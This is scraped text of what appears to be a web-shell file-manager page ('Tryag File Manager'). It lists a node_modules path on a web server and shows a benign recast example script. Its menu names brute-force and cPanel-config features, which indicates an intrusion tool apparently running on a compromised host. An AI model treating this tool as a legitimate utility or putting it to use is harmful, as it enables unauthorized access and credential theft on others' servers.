Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current none :
/
var
/
www
/
html
/
tpid-karpenter
/
web
/
node_modules
/
recast
/
example
/
Or
Select Your none :
Upload File :
New :
File
Dir
/var/www/html/tpid-karpenter/web/node_modules/recast/example/identity
#!/usr/bin/env node // This script should echo the contents of the given file without // modification. require("recast").run(function(ast, callback) { callback(ast); });